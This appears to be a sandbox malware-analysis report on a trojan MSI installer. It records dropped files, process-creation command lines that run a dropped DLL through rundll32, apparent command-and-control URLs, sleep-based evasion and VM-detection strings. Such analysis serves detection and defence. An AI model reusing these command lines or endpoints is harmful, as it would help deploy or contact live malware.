                  Source: explorer.exe, 00000009.00000002.3805949216.0000000003256000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3081083635.000000000325F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/c
                  Source: explorer.exe, 00000009.00000003.3073651112.000000000C58E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/hanced
                  Source: explorer.exe, 00000009.00000002.3816713728.000000000C4A3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/r
                  Source: explorer.exe, 00000009.00000003.3078648933.000000000C4CC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/s
                  Source: explorer.exe, 00000009.00000002.3805851465.0000000003249000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/z
                  Source: explorer.exe, 00000009.00000002.3810313194.00000000085CE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://opewolumeras.com/test/
                  Source: explorer.exe, 00000009.00000002.3816713728.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1795302948.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                  Source: explorer.exe, 00000009.00000002.3816713728.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1795302948.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
                  Source: rundll32.exe, 00000006.00000003.1608485386.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1558572897.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1707394082.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1543502588.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1615547549.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1513808146.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1450359147.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com/
                  Source: rundll32.exe, 00000006.00000003.1457055405.0000016AD281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1532906794.0000016AD281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1615547549.0000016AD2817000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1463527230.0000016AD281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1707394082.0000016AD2816000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1522469474.0000016AD281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1543477822.0000016AD281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2769645862.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1642587967.0000016AD281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2831581713.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1720996678.0000016AD2816000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD2817000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1608485386.0000016AD2817000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2831581713.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1513792190.0000016AD281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1558572897.0000016AD2817000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/
                  Source: rundll32.exe, 00000006.00000003.2769645862.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/:
                  Source: rundll32.exe, 00000006.00000003.1707394082.0000016AD2816000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1720996678.0000016AD2816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/C%m
                  Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:62255 version: TLS 1.2
                  Source: rundll32.exe, 00000006.00000003.1364766656.0000016AD28E2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DirectInput8Create memstr_169633ac-3
                  Source: rundll32.exe, 00000006.00000003.1364766656.0000016AD28E2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: GetRawInputData memstr_b5e792e3-e
                  Source: Yara match File source: 00000006.00000003.1364766656.0000016AD28E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7656, type: MEMORYSTR
                  Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000016AD27DD98E NtAllocateVirtualMemory,6_3_0000016AD27DD98E
                  Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000016AD27DD9FE NtOpenFile,6_3_0000016AD27DD9FE
                  Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000016AD27DDA6E NtProtectVirtualMemory,6_3_0000016AD27DDA6E
                  Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000016AD27DDACE NtReadFile,6_3_0000016AD27DDACE
                  Source: C:\Windows\explorer.exe Code function: 9_2_00F282B4 NtFreeVirtualMemory,9_2_00F282B4
                  Source: C:\Windows\explorer.exe Code function: 9_2_00F2B388 NtAllocateVirtualMemory,9_2_00F2B388
                  Source: C:\Windows\explorer.exe Code function: 9_2_00F2C704 NtDelayExecution,9_2_00F2C704
                  Source: C:\Windows\explorer.exe Code function: 9_2_00F280B8 RtlInitUnicodeString,NtCreateFile,9_2_00F280B8
                  Source: C:\Windows\explorer.exe Code function: 9_2_00F28240 NtClose,9_2_00F28240
                  Source: C:\Windows\explorer.exe Code function: 9_2_00F281C8 NtWriteFile,9_2_00F281C8
                  Source: C:\Windows\explorer.exe Code function: 9_2_00F301A0 NtFreeVirtualMemory,9_2_00F301A0
                  Source: C:\Windows\explorer.exe Code function: 9_2_00F30130 NtAllocateVirtualMemory,9_2_00F30130
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\6a9d65.msi
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI9E30.tmp
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI9EBE.tmp
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI9EEE.tmp
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI9F0E.tmp
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\SourceHash{68C54E68-8D6C-454F-B2BE-2596868E8867}
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI9F7C.tmp
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIA029.tmp
                  Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSI9E30.tmp
                  Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\vierm_soft_x64.dll 97A6331239D451D7DFE15BFE17DE8B419DF741AE68BACD440808F8B8D3F99B8A
                  Source: C:\Windows\System32\rundll32.exe Code function: String function: 000000018004816C appears 44 times
                  Source: C:\Windows\System32\rundll32.exe Code function: String function: 0000000180001400 appears 56 times
                  Source: C:\Windows\Installer\MSIA029.tmp Code function: String function: 00F53292 appears 70 times
                  Source: C:\Windows\Installer\MSIA029.tmp Code function: String function: 00F53790 appears 39 times
                  Source: C:\Windows\Installer\MSIA029.tmp Code function: String function: 00F5325F appears 103 times
                  Source: das.msi Binary or memory string: OriginalFilenameviewer.exeF vs das.msi
                  Source: das.msi Binary or memory string: OriginalFilenameAICustAct.dllF vs das.msi
                  Source: classification engine Classification label: mal100.troj.evad.winMSI@9/24@7/3
                  Source: C:\Windows\Installer\MSIA029.tmp Code function: 4_2_00F33860 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle
                  Source: C:\Windows\Installer\MSIA029.tmp Code function: 4_2_00F34BA0 CoInitialize,CoCreateInstance,VariantInit,VariantClear,IUnknown_QueryService,IUnknown_QueryInterface_Proxy,IUnknown_QueryInterface_Proxy,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error
                  Source: C:\Windows\Installer\MSIA029.tmp Code function: 4_2_00F345B0 LoadResource,LockResource,SizeofResource
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\Microsoft\CML9FF5.tmp
                  Source: C:\Windows\System32\rundll32.exe Mutant created: NULL
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\TEMP\~DF5DC67D3219BCB6E9.TMP
                  Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini
                  Source: C:\Windows\Installer\MSIA029.tmp Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
                  Source: unknown Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\das.msi"
                  Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                  Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 042055341D46BDE43A4D1CB4423C312E
                  Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\Installer\MSIA029.tmp "C:\Windows\Installer\MSIA029.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
                  Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
                  Source: C:\Windows\System32\msiexec.exe Section loaded: apphelp.dll, aclayers.dll, sfc.dll, sfc_os.dll, msi.dll, srpapi.dll, kernel.appcore.dll, tsappcmp.dll, uxtheme.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, windows.storage.dll, wldp.dll, propsys.dll, textshaping.dll, netapi32.dll, wkscli.dll, netutils.dll, version.dll, mscoree.dll, profapi.dll, sspicli.dll, pcacli.dll, mpr.dll, userenv.dll, srclient.dll, spp.dll, powrprof.dll, vssapi.dll, vsstrace.dll, umpdc.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, cabinet.dll
                  Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll, aclayers.dll, mpr.dll, sfc.dll, sfc_os.dll, kernel.appcore.dll, msi.dll, netapi32.dll, iphlpapi.dll, samcli.dll, netutils.dll, logoncli.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll
                  Source: C:\Windows\Installer\MSIA029.tmp Section loaded: kernel.appcore.dll, uxtheme.dll, sxs.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                  Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.schema.shell.dll, netapi32.dll, dsrole.dll
                  Source: C:\Windows\Installer\MSIA029.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32
                  Source: das.msi Static file information: File size 1669120 > 1048576
                  Source: Binary string: kernel32.pdbUGP source: rundll32.exe, 00000006.00000003.1368921552.0000016AD27E1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: kernelbase.pdbUGP source: rundll32.exe, 00000006.00000003.1364766656.0000016AD28E2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\BUILD\work\b69487f8af4577da\BUILDSENG\Release\x64\ArPotEx64.pdb source: rundll32.exe, 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmp, vierm_soft_x64.dll.2.dr
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSIA029.tmp, 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp, MSIA029.tmp, 00000004.00000000.1352453561.0000000000F77000.00000002.00000001.01000000.00000003.sdmp, das.msi, 6a9d65.msi.2.dr, MSIA029.tmp.2.dr, MSI9F7C.tmp.2.dr
                  Source: Binary string: ntdll.pdb source: rundll32.exe, 00000006.00000003.1363899057.0000016AD27ED000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: kernel32.pdb source: rundll32.exe, 00000006.00000003.1368921552.0000016AD27E1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000006.00000003.1363899057.0000016AD27ED000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: das.msi, MSI9E30.tmp.2.dr, 6a9d65.msi.2.dr, MSI9F0E.tmp.2.dr, MSI9EEE.tmp.2.dr, MSI9EBE.tmp.2.dr
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: das.msi, MSI9E30.tmp.2.dr, 6a9d65.msi.2.dr, MSI9F0E.tmp.2.dr, MSI9EEE.tmp.2.dr, MSI9EBE.tmp.2.dr
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSIA029.tmp, 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp, MSIA029.tmp, 00000004.00000000.1352453561.0000000000F77000.00000002.00000001.01000000.00000003.sdmp, das.msi, 6a9d65.msi.2.dr, MSIA029.tmp.2.dr, MSI9F7C.tmp.2.dr
                  Source: Binary string: kernelbase.pdb source: rundll32.exe, 00000006.00000003.1364766656.0000016AD28E2000.00000004.00000020.00020000.00000000.sdmp
                  Source: vierm_soft_x64.dll.2.drStatic PE information: real checksum: 0x81152 should be: 0xbc113
                  Source: vierm_soft_x64.dll.2.drStatic PE information: section name: memcpy_
                  Source: vierm_soft_x64.dll.2.drStatic PE information: section name: _RDATA
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F5323C push ecx; ret 4_2_00F5324F
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_3_0000016AD27A00D8 push cs; retf 6_3_0000016AD27A00FD
                  Source: C:\Windows\explorer.exeCode function: 9_2_00F2EE21 push rsi; ret 9_2_00F2EE27
                  Source: C:\Windows\explorer.exeCode function: 9_2_00F2F5BA push rcx; ret 9_2_00F2F5BC
                  Source: C:\Windows\explorer.exeCode function: 9_2_00F2EF4F push D5912897h; iretq 9_2_00F2EF57

                  Persistence and Installation Behavior

                  Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSIA029.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9F0E.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9EBE.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9EEE.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9E30.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA029.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\vierm_soft_x64.dllJump to dropped file

                  Hooking and other Techniques for Hiding and Protection

                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49701
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,GetAdaptersInfo,9_2_00F27274
                  Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,9_2_00F28424
                  Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,9_2_00F30610
                  Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 1782Jump to behavior
                  Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 8082Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 4116Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 695Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 4965Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 888Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 870Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI9F0E.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI9EBE.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI9EEE.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI9E30.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\vierm_soft_x64.dllJump to dropped file
                  Source: C:\Windows\Installer\MSIA029.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-33658
                  Source: C:\Windows\Installer\MSIA029.tmpAPI coverage: 6.4 %
                  Source: C:\Windows\System32\rundll32.exeAPI coverage: 5.5 %
                  Source: C:\Windows\System32\rundll32.exe TID: 7660Thread sleep count: 1782 > 30Jump to behavior
                  Source: C:\Windows\System32\rundll32.exe TID: 7660Thread sleep time: -106920000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\rundll32.exe TID: 7660Thread sleep count: 8082 > 30Jump to behavior
                  Source: C:\Windows\System32\rundll32.exe TID: 7660Thread sleep time: -484920000s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 8188Thread sleep count: 4116 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 8188Thread sleep time: -4116000s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 6584Thread sleep count: 695 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 6584Thread sleep time: -69500s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 8188Thread sleep count: 4965 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 8188Thread sleep time: -4965000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F6AF79 FindFirstFileExW,4_2_00F6AF79
                  Source: C:\Windows\explorer.exeCode function: 9_2_00F2A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,LoadLibraryExW,9_2_00F2A8E0
                  Source: C:\Windows\explorer.exeCode function: 9_2_00F22B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,9_2_00F22B28
                  Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 60000Jump to behavior
                  Source: explorer.exe, 00000009.00000002.3794284200.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000I
                  Source: rundll32.exe, 00000006.00000003.1608485386.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1558572897.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1707394082.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1543502588.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1615547549.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1513808146.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1450359147.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWW2
                  Source: explorer.exe, 00000009.00000000.1790343221.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                  Source: explorer.exe, 00000009.00000003.2277712034.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                  Source: rundll32.exe, 00000006.00000003.1608485386.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1558572897.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3805248446.0000016AD0D48000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1707394082.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1543502588.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1615547549.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1513808146.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1450359147.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: explorer.exe, 00000009.00000000.1790343221.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
                  Source: explorer.exe, 00000009.00000000.1790343221.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
                  Source: explorer.exe, 00000009.00000000.1790343221.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                  Source: explorer.exe, 00000009.00000000.1791266554.0000000007306000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_xU1
                  Source: explorer.exe, 00000009.00000003.2282491721.000000000C3FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                  Source: explorer.exe, 00000009.00000003.2277712034.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
                  Source: explorer.exe, 00000009.00000003.3079591832.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000I}~"
                  Source: explorer.exe, 00000009.00000003.2277712034.0000000009052000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000}io
                  Source: explorer.exe, 00000009.00000003.3079591832.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                  Source: explorer.exe, 00000009.00000000.1792832688.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3079591832.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3811134225.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2277712034.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\machine.inf_loc5
                  Source: rundll32.exe, 00000006.00000003.1364766656.0000016AD28E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                  Source: explorer.exe, 00000009.00000000.1790343221.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware20,1
                  Source: explorer.exe, 00000009.00000000.1790343221.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
                  Source: explorer.exe, 00000009.00000003.2277712034.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMWare
                  Source: explorer.exe, 00000009.00000003.2277712034.0000000009052000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000'
                  Source: explorer.exe, 00000009.00000000.1791266554.0000000007306000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                  Source: explorer.exe, 00000009.00000003.2277712034.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3079591832.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1792832688.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3811134225.0000000008F27000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWT`
                  Source: explorer.exe, 00000009.00000000.1790343221.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES1371
                  Source: explorer.exe, 00000009.00000000.1790343221.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
                  Source: rundll32.exe, 00000006.00000003.1364766656.0000016AD28E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                  Source: explorer.exe, 00000009.00000000.1790343221.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                  Source: explorer.exe, 00000009.00000002.3794284200.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                  Source: explorer.exe, 00000009.00000003.2277712034.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 00000009.00000002.3794284200.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_6-32680
                  Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
